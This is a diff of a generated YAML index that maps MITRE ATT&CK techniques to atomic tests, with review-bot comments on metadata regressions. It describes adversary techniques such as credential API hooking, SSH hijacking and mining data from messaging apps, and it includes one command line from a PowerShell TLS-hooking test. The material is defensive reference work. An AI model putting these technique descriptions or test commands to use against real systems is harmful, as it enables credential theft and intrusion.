+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
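Review bot: splitting the single contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into `Naveen Vijayaraghavan` and `Nilesh Dherange (Gurucul)` narrows the Gurucul affiliation to the second name only; confirm this matches the upstream STIX object rather than a comma split in the generator. The three new `(Citation: ...)` tags in the description (Mitiga, TrendMicro Exposed Redis 2020, Cybernews Reuters Leak 2022) need matching `external_references` entries, and they are added in the following hunks of this object, so the links resolve. The `(i.e., ...)` wording where `e.g.` is meant is upstream ATT&CK text and should be raised there, not hand-edited in this generated file.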
@@ -69438,10 +70046,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
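Review bot: the platform list drops `Office 365` and `Google Workspace` and adds `Office Suite`, so any per-platform index file keyed on the retired names will stop receiving T1213 from the generator while a new office-suite index is needed; confirm the index CSVs were regenerated in the same change and that nothing downstream still filters on `Office 365` or `Google Workspace`. The `x_mitre_version` bump 3.3 to 3.4 is consistent with a platform change.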
@@ -69454,10 +70061,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -69466,11 +70083,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
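Review bot: `spec_version: '2.1'` is removed from this object and, as the later hunks show, from every technique in the diff, with nothing replacing it; if any consumer validates these records as STIX 2.1 objects, where `spec_version` is a required common property, they will fail validation. If the drop is intentional because `x_mitre_attack_spec_version` is now the only version marker kept, state that in the commit message; otherwise keep emitting the key. Separately, `Vilius Petkauskas .` in the new Cybernews entry has a stray space before the period; it comes from the upstream data and should be fixed there rather than edited here.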
@@ -69507,7 +70127,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
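Review bot: `modified` for T1602.001 moves backwards, from 2021-04-29 to 2020-10-22, and the same regression appears for T1563.001 later in this diff (2021-04-29 to 2020-03-23). A sync from a newer ATT&CK release should not move timestamps into the past, so this suggests the generator is now reading an older or differently normalised source object for these two techniques; confirm the input before merging, because anything that uses `modified` to detect updated techniques will treat both as stale.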
@@ -69539,80 +70159,10 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
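Review bot: T1602.001 loses both `spec_version` and `x_mitre_attack_spec_version` here with neither re-added, unlike the other objects in this diff, which get `x_mitre_attack_spec_version: 3.2.0`; after this change the SNMP (MIB Dump) record carries no version marker at all, so check whether the source object is genuinely missing it or the generator skipped it. The remaining removed lines are T1056.004's `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references`, which reappear later in the same object in a different key order; the reorder is a no-op semantically but makes the hunk hard to review. Emitting keys in a stable order in the generator would keep future sync diffs down to the actual data changes.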
@@ -69625,23 +70175,89 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
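Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is dropped from T1056.004 without replacement, while the same key is still present on T1602.001 (`Administrator`) and T1563.001 (`root`) elsewhere in this diff; if the upstream object really lost the field, anything that renders or filters on required permissions needs a missing-key case. The re-emitted `external_references` block is the same fourteen sources as before in a different order, and `x_mitre_version` 1.0 to 1.1 with `revoked: false` and `x_mitre_deprecated: false` added matches the layout used for the other objects.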
@@ -69677,10 +70293,81 @@ collection:
Invoke-WebRequest #{server_name} -UseBasicParsing
name: powershell
elevation_required: true
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
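Review bot: the new T1213.005 (Messaging Applications) entry ships with `x_mitre_detection: ''` and `atomic_tests: []`; the empty string, rather than an absent key, should be handled by whatever renders the detection section or it will emit an empty heading. Two whitespace oddities arrive with the upstream text: the description begins with an escaped space (`\ \n\n`) and the Sentinel Labs `description` starts with a leading space (`" Jim Walter...`); both are harmless YAML but worth reporting upstream. All five `(Citation: ...)` tags in the description do have a matching `source_name` in `external_references`.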
@@ -69691,6 +70378,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -69700,7 +70388,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -69716,66 +70403,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
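Review bot: almost all of this hunk is T1021.005's `external_references` list re-emitted in a different order; the only content changes are `revoked: false`, the Havana authentication bug entry moving from `http://` to `https://lists.openstack.org/...` with its retrieved date updated to September 12, 2024, `x_mitre_attack_spec_version` 3.1.0 to 3.2.0, and `x_mitre_modified_by_ref` now placed at the end of the object. Consider having the generator keep `external_references` in source order, or sort them by `source_name`, so a reorder does not show up as a 60-line rewrite.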
@@ -69800,11 +70488,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -69827,9 +70515,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -69880,7 +70567,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -69944,7 +70630,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests:
- name: USB Malware Spread Simulation
@@ -70037,7 +70722,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -70074,7 +70758,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -70105,8 +70789,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
